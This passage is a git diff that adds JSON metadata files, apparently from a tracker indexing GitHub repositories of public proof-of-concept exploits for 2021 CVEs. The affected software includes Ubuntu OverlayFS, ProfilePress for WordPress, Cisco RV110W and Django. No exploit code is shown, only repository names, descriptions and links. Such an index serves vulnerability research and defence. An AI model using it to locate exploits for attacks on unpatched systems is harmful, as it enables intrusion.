index 0000000000..671d925890 --- /dev/null +++ b/2021/CVE-2021-34600.json @@ -0,0 +1,33 @@ +[ + { + "id": 448961283, + "name": "CVE-2021-34600", + "full_name": "x41sec\/CVE-2021-34600", + "owner": { + "login": "x41sec", + "id": 15672611, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15672611?v=4", + "html_url": "https:\/\/github.com\/x41sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x41sec\/CVE-2021-34600", + "description": null, + "fork": false, + "created_at": "2022-01-17T16:08:17Z", + "updated_at": "2024-01-17T16:03:48Z", + "pushed_at": "2022-01-17T16:09:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34621.json b/2021/CVE-2021-34621.json new file mode 100644 index 0000000000..c8147d1ec1 --- /dev/null +++ b/2021/CVE-2021-34621.json @@ -0,0 +1,99 @@ +[ + { + "id": 676520078, + "name": "CVE-2021-34621", + "full_name": "RandomRobbieBF\/CVE-2021-34621", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2021-34621", + "description": "ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation", + "fork": false, + "created_at": "2023-08-09T11:41:56Z", + "updated_at": "2024-08-12T20:32:24Z", + "pushed_at": "2023-08-09T11:45:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-34621", + "wordpress", + "wordpress-exploit" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 677857358, + "name": "CVE-2021-34621-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2021-34621-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2021-34621-EXPLOIT", + "description": "A PoC exploit for CVE-2021-34621 - WordPress Privilege Escalation", + "fork": false, + "created_at": "2023-08-12T21:51:37Z", + "updated_at": "2023-08-13T13:21:46Z", + "pushed_at": "2023-08-13T13:20:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 698646022, + "name": "CVE-2021-34621", + "full_name": "navreet1425\/CVE-2021-34621", + "owner": { + "login": "navreet1425", + "id": 68342969, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68342969?v=4", + "html_url": "https:\/\/github.com\/navreet1425", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/navreet1425\/CVE-2021-34621", + "description": null, + "fork": false, + "created_at": "2023-09-30T14:36:58Z", + "updated_at": "2024-09-27T22:36:00Z", + "pushed_at": "2023-09-30T14:39:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34646.json b/2021/CVE-2021-34646.json new file mode 100644 index 0000000000..d641c46b2e --- /dev/null +++ b/2021/CVE-2021-34646.json @@ -0,0 +1,64 @@ +[ + { + "id": 403075256, + "name": "CVE-2021-34646", + "full_name": "motikan2010\/CVE-2021-34646", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2021-34646", + "description": "CVE-2021-34646 PoC", + "fork": false, + "created_at": "2021-09-04T14:19:05Z", + "updated_at": "2024-06-26T12:07:03Z", + "pushed_at": "2021-09-04T14:23:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 800865797, + "name": "CVE-2021-34646", + "full_name": "0xB455\/CVE-2021-34646", + "owner": { + "login": "0xB455", + "id": 17347389, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17347389?v=4", + "html_url": "https:\/\/github.com\/0xB455", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xB455\/CVE-2021-34646", + "description": "PoC for CVE-2021-34646", + "fork": false, + "created_at": "2024-05-15T06:35:42Z", + "updated_at": "2024-05-16T08:27:29Z", + "pushed_at": "2024-05-15T06:41:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34730.json b/2021/CVE-2021-34730.json new file mode 100644 index 0000000000..d0bb03efe8 --- /dev/null +++ b/2021/CVE-2021-34730.json @@ -0,0 +1,33 @@ +[ + { + "id": 412035553, + "name": "CVE-2021-34730", + "full_name": "badmonkey7\/CVE-2021-34730", + "owner": { + "login": "badmonkey7", + "id": 41368882, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41368882?v=4", + "html_url": "https:\/\/github.com\/badmonkey7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badmonkey7\/CVE-2021-34730", + "description": "Cisco RV110w UPnP stack overflow ", + "fork": false, + "created_at": "2021-09-30T11:21:04Z", + "updated_at": "2024-08-12T20:16:51Z", + "pushed_at": "2021-09-30T11:33:35Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 25, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34767.json b/2021/CVE-2021-34767.json new file mode 100644 index 0000000000..fbe2af654b --- /dev/null +++ b/2021/CVE-2021-34767.json @@ -0,0 +1,33 @@ +[ + { + "id": 580514889, + "name": "CVE-2021-34767", + "full_name": "lukejenkins\/CVE-2021-34767", + "owner": { + "login": "lukejenkins", + "id": 15523955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15523955?v=4", + "html_url": "https:\/\/github.com\/lukejenkins", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lukejenkins\/CVE-2021-34767", + "description": "Cisco IOS XE Software for Catalyst 9800 Series Wireless Controllers IPv6 Denial of Service Vulnerability", + "fork": false, + "created_at": "2022-12-20T18:53:00Z", + "updated_at": "2022-12-20T18:53:00Z", + "pushed_at": "2022-12-20T19:00:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34824.json b/2021/CVE-2021-34824.json new file mode 100644 index 0000000000..5a0365328a --- /dev/null +++ b/2021/CVE-2021-34824.json @@ -0,0 +1,33 @@ +[ + { + "id": 581616849, + "name": "CVE-2021-34824", + "full_name": "rsalmond\/CVE-2021-34824", + "owner": { + "login": "rsalmond", + "id": 4367945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4367945?v=4", + "html_url": "https:\/\/github.com\/rsalmond", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rsalmond\/CVE-2021-34824", + "description": "reproducing an old istio bug", + "fork": false, + "created_at": "2022-12-23T18:19:06Z", + "updated_at": "2022-12-23T18:34:58Z", + "pushed_at": "2023-01-04T16:31:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3490.json b/2021/CVE-2021-3490.json new file mode 100644 index 0000000000..247b96f4a8 --- /dev/null +++ b/2021/CVE-2021-3490.json @@ -0,0 +1,95 @@ +[ + { + "id": 380022368, + "name": "Linux_LPE_eBPF_CVE-2021-3490", + "full_name": "chompie1337\/Linux_LPE_eBPF_CVE-2021-3490", + "owner": { + "login": "chompie1337", + "id": 56364411, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56364411?v=4", + "html_url": "https:\/\/github.com\/chompie1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chompie1337\/Linux_LPE_eBPF_CVE-2021-3490", + "description": null, + "fork": false, + "created_at": "2021-06-24T18:50:17Z", + "updated_at": "2024-11-23T01:33:31Z", + "pushed_at": "2023-07-10T16:41:49Z", + "stargazers_count": 295, + "watchers_count": 295, + "has_discussions": false, + "forks_count": 52, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 52, + "watchers": 295, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 624239303, + "name": "CVE-2021-3490", + "full_name": "pivik271\/CVE-2021-3490", + "owner": { + "login": "pivik271", + "id": 82135340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82135340?v=4", + "html_url": "https:\/\/github.com\/pivik271", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pivik271\/CVE-2021-3490", + "description": null, + "fork": false, + "created_at": "2023-04-06T03:21:11Z", + "updated_at": "2024-09-17T20:37:12Z", + "pushed_at": "2023-04-06T03:49:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895140841, + "name": "CVE-2021-3490", + "full_name": "BanaxavSplit\/CVE-2021-3490", + "owner": { + "login": "BanaxavSplit", + "id": 66732115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66732115?v=4", + "html_url": "https:\/\/github.com\/BanaxavSplit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BanaxavSplit\/CVE-2021-3490", + "description": null, + "fork": false, + "created_at": "2024-11-27T16:23:14Z", + "updated_at": "2024-11-27T16:23:15Z", + "pushed_at": "2024-11-27T16:23:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3492.json b/2021/CVE-2021-3492.json new file mode 100644 index 0000000000..cb9bd4aa9c --- /dev/null +++ b/2021/CVE-2021-3492.json @@ -0,0 +1,33 @@ +[ + { + "id": 380980454, + "name": "CVE-2021-3492", + "full_name": "synacktiv\/CVE-2021-3492", + "owner": { + "login": "synacktiv", + "id": 50145679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4", + "html_url": "https:\/\/github.com\/synacktiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synacktiv\/CVE-2021-3492", + "description": "PoC for CVE-2021-3492 used at Pwn2Own 2021", + "fork": false, + "created_at": "2021-06-28T09:43:31Z", + "updated_at": "2024-08-12T20:14:18Z", + "pushed_at": "2021-08-03T14:48:27Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 40, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3493.json b/2021/CVE-2021-3493.json new file mode 100644 index 0000000000..c05a5ca777 --- /dev/null +++ b/2021/CVE-2021-3493.json @@ -0,0 +1,419 @@ +[ + { + "id": 359584311, + "name": "CVE-2021-3493", + "full_name": "briskets\/CVE-2021-3493", + "owner": { + "login": "briskets", + "id": 58673953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58673953?v=4", + "html_url": "https:\/\/github.com\/briskets", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/briskets\/CVE-2021-3493", + "description": "Ubuntu OverlayFS Local Privesc", + "fork": false, + "created_at": "2021-04-19T20:07:01Z", + "updated_at": "2024-11-11T11:09:47Z", + "pushed_at": "2024-04-02T02:48:18Z", + "stargazers_count": 408, + "watchers_count": 408, + "has_discussions": false, + "forks_count": 137, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 137, + "watchers": 408, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 360363904, + "name": "CVE-2021-3493", + "full_name": "oneoy\/CVE-2021-3493", + "owner": { + "login": "oneoy", + "id": 38435398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38435398?v=4", + "html_url": "https:\/\/github.com\/oneoy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oneoy\/CVE-2021-3493", + "description": null, + "fork": false, + "created_at": "2021-04-22T02:06:21Z", + "updated_at": "2022-09-17T13:58:46Z", + "pushed_at": "2021-04-22T02:06:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 363546140, + "name": "CVE-2021-3493", + "full_name": "Abdennour-py\/CVE-2021-3493", + "owner": { + "login": "Abdennour-py", + "id": 82690595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82690595?v=4", + "html_url": "https:\/\/github.com\/Abdennour-py", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdennour-py\/CVE-2021-3493", + "description": null, + "fork": false, + "created_at": "2021-05-02T01:58:29Z", + "updated_at": "2021-05-02T01:58:40Z", + "pushed_at": "2021-05-02T01:58:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 383693831, + "name": "CVE-2021-3493", + "full_name": "inspiringz\/CVE-2021-3493", + "owner": { + "login": "inspiringz", + "id": 47313597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47313597?v=4", + "html_url": "https:\/\/github.com\/inspiringz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/inspiringz\/CVE-2021-3493", + "description": "CVE-2021-3493 Ubuntu OverlayFS Local Privesc (Interactive Bash Shell & Execute Command Entered)", + "fork": false, + "created_at": "2021-07-07T06:16:48Z", + "updated_at": "2024-08-12T20:14:31Z", + "pushed_at": "2021-07-07T07:19:03Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3493", + "exploit", + "linux", + "privesc", + "ubuntu" + ], + "visibility": "public", + "forks": 9, + "watchers": 37, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 386503700, + "name": "CVE-2021-3493", + "full_name": "derek-turing\/CVE-2021-3493", + "owner": { + "login": "derek-turing", + "id": 69493947, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69493947?v=4", + "html_url": "https:\/\/github.com\/derek-turing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/derek-turing\/CVE-2021-3493", + "description": "CVE-2021-3493 Ubuntu漏洞", + "fork": false, + "created_at": "2021-07-16T04:02:54Z", + "updated_at": "2021-07-16T04:04:35Z", + "pushed_at": "2021-07-16T04:04:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 405634949, + "name": "overlayFS-CVE-2021-3493", + "full_name": "cerodah\/overlayFS-CVE-2021-3493", + "owner": { + "login": "cerodah", + "id": 82907557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82907557?v=4", + "html_url": "https:\/\/github.com\/cerodah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cerodah\/overlayFS-CVE-2021-3493", + "description": "2021 kernel vulnerability in Ubuntu.", + "fork": false, + "created_at": "2021-09-12T12:25:02Z", + "updated_at": "2024-09-19T13:21:31Z", + "pushed_at": "2021-09-12T19:54:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 412824012, + "name": "CVE-2021-3493", + "full_name": "puckiestyle\/CVE-2021-3493", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2021-3493", + "description": null, + "fork": false, + "created_at": "2021-10-02T14:44:43Z", + "updated_at": "2023-01-10T03:23:13Z", + "pushed_at": "2021-10-02T14:44:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 572048993, + "name": "CVE-2021-3493", + "full_name": "fei9747\/CVE-2021-3493", + "owner": { + "login": "fei9747", + "id": 37730810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37730810?v=4", + "html_url": "https:\/\/github.com\/fei9747", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fei9747\/CVE-2021-3493", + "description": null, + "fork": false, + "created_at": "2022-11-29T12:56:00Z", + "updated_at": "2022-11-30T06:04:21Z", + "pushed_at": "2022-11-29T12:56:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589425086, + "name": "OverlayFS-CVE-2021-3493", + "full_name": "pmihsan\/OverlayFS-CVE-2021-3493", + "owner": { + "login": "pmihsan", + "id": 89512452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89512452?v=4", + "html_url": "https:\/\/github.com\/pmihsan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pmihsan\/OverlayFS-CVE-2021-3493", + "description": "Exploit For OverlayFS ", + "fork": false, + "created_at": "2023-01-16T04:29:39Z", + "updated_at": "2023-07-24T09:41:05Z", + "pushed_at": "2023-01-16T04:34:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3493", + "file-system-vulnerability", + "overlay-fs" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 643372099, + "name": "CVE-2021-3493", + "full_name": "smallkill\/CVE-2021-3493", + "owner": { + "login": "smallkill", + "id": 19218766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19218766?v=4", + "html_url": "https:\/\/github.com\/smallkill", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smallkill\/CVE-2021-3493", + "description": null, + "fork": false, + "created_at": "2023-05-21T00:14:40Z", + "updated_at": "2023-05-21T00:15:16Z", + "pushed_at": "2023-05-21T00:15:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 682926321, + "name": "OverlayFS---CVE-2021-3493", + "full_name": "ptkhai15\/OverlayFS---CVE-2021-3493", + "owner": { + "login": "ptkhai15", + "id": 94296191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94296191?v=4", + "html_url": "https:\/\/github.com\/ptkhai15", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ptkhai15\/OverlayFS---CVE-2021-3493", + "description": null, + "fork": false, + "created_at": "2023-08-25T07:26:35Z", + "updated_at": "2023-08-25T07:41:07Z", + "pushed_at": "2023-08-25T07:41:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824252334, + "name": "CVE-2021-3493_CVE-2022-3357", + "full_name": "iamz24\/CVE-2021-3493_CVE-2022-3357", + "owner": { + "login": "iamz24", + "id": 97619614, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97619614?v=4", + "html_url": "https:\/\/github.com\/iamz24", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iamz24\/CVE-2021-3493_CVE-2022-3357", + "description": null, + "fork": false, + "created_at": "2024-07-04T17:29:28Z", + "updated_at": "2024-07-04T20:20:33Z", + "pushed_at": "2024-07-04T20:20:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858137565, + "name": "OverlayFS-CVE-2021-3493", + "full_name": "fathallah17\/OverlayFS-CVE-2021-3493", + "owner": { + "login": "fathallah17", + "id": 88498991, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88498991?v=4", + "html_url": "https:\/\/github.com\/fathallah17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fathallah17\/OverlayFS-CVE-2021-3493", + "description": "Exploit a 2021 Kernel vulnerability in Ubuntu to become root almost instantly!", + "fork": false, + "created_at": "2024-09-16T11:28:32Z", + "updated_at": "2024-09-16T12:37:40Z", + "pushed_at": "2024-09-16T12:23:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "tryhackme", + "tryhackme-answers", + "tryhackme-writeups" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35042.json b/2021/CVE-2021-35042.json new file mode 100644 index 0000000000..59fee729a0 --- /dev/null +++ b/2021/CVE-2021-35042.json @@ -0,0 +1,157 @@ +[ + { + "id": 384694670, + "name": "CVE-2021-35042", + "full_name": "YouGina\/CVE-2021-35042", + "owner": { + "login": "YouGina", + "id": 5002624, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5002624?v=4", + "html_url": "https:\/\/github.com\/YouGina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YouGina\/CVE-2021-35042", + "description": "SQL injection via unsanitized QuerySet.order_by() input", + "fork": false, + "created_at": "2021-07-10T12:38:52Z", + "updated_at": "2024-06-25T06:40:43Z", + "pushed_at": "2021-07-10T13:43:54Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 402138788, + "name": "CVE-2021-35042", + "full_name": "mrlihd\/CVE-2021-35042", + "owner": { + "login": "mrlihd", + "id": 77404450, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77404450?v=4", + "html_url": "https:\/\/github.com\/mrlihd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrlihd\/CVE-2021-35042", + "description": "Reproduce CVE-2021-35042", + "fork": false, + "created_at": "2021-09-01T16:59:42Z", + "updated_at": "2021-09-18T03:17:20Z", + "pushed_at": "2021-09-18T03:16:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 410014595, + "name": "CVE-2021-35042", + "full_name": "r4vi\/CVE-2021-35042", + "owner": { + "login": "r4vi", + "id": 565628, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/565628?v=4", + "html_url": "https:\/\/github.com\/r4vi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r4vi\/CVE-2021-35042", + "description": null, + "fork": false, + "created_at": "2021-09-24T15:30:25Z", + "updated_at": "2022-06-03T05:45:29Z", + "pushed_at": "2022-02-10T16:43:22Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485202008, + "name": "CVE-2021-35042", + "full_name": "zer0qs\/CVE-2021-35042", + "owner": { + "login": "zer0qs", + "id": 83699106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83699106?v=4", + "html_url": "https:\/\/github.com\/zer0qs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zer0qs\/CVE-2021-35042", + "description": "A basic analysis about CVE-2021-35942. SQL injection in Django.", + "fork": false, + "created_at": "2022-04-25T02:50:00Z", + "updated_at": "2023-06-27T01:32:32Z", + "pushed_at": "2022-04-29T02:16:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 642158825, + "name": "CVE-2021-35042", + "full_name": "LUUANHDUC\/CVE-2021-35042", + "owner": { + "login": "LUUANHDUC", + "id": 125422094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125422094?v=4", + "html_url": "https:\/\/github.com\/LUUANHDUC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LUUANHDUC\/CVE-2021-35042", + "description": "Django SQL injection vulnerability", + "fork": false, + "created_at": "2023-05-18T00:35:20Z", + "updated_at": "2023-05-18T00:36:36Z", + "pushed_at": "2023-05-18T00:40:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35064.json b/2021/CVE-2021-35064.json new file mode 100644 index 0000000000..2a5a4e168f --- /dev/null +++ b/2021/CVE-2021-35064.json @@ -0,0 +1,33 @@ +[ + { + "id": 498962746, + "name": "CVE-2021-35064", + "full_name": "Chocapikk\/CVE-2021-35064", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2021-35064", + "description": "Python script to exploit CVE-2021-35064 and CVE-2021-36356", + "fork": false, + "created_at": "2022-06-02T02:19:49Z", + "updated_at": "2024-08-12T20:23:46Z", + "pushed_at": "2022-06-02T17:29:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3516.json b/2021/CVE-2021-3516.json new file mode 100644 index 0000000000..17842b42be --- /dev/null +++ b/2021/CVE-2021-3516.json @@ -0,0 +1,33 @@ +[ + { + "id": 386162783, + "name": "CVE-2021-3516", + 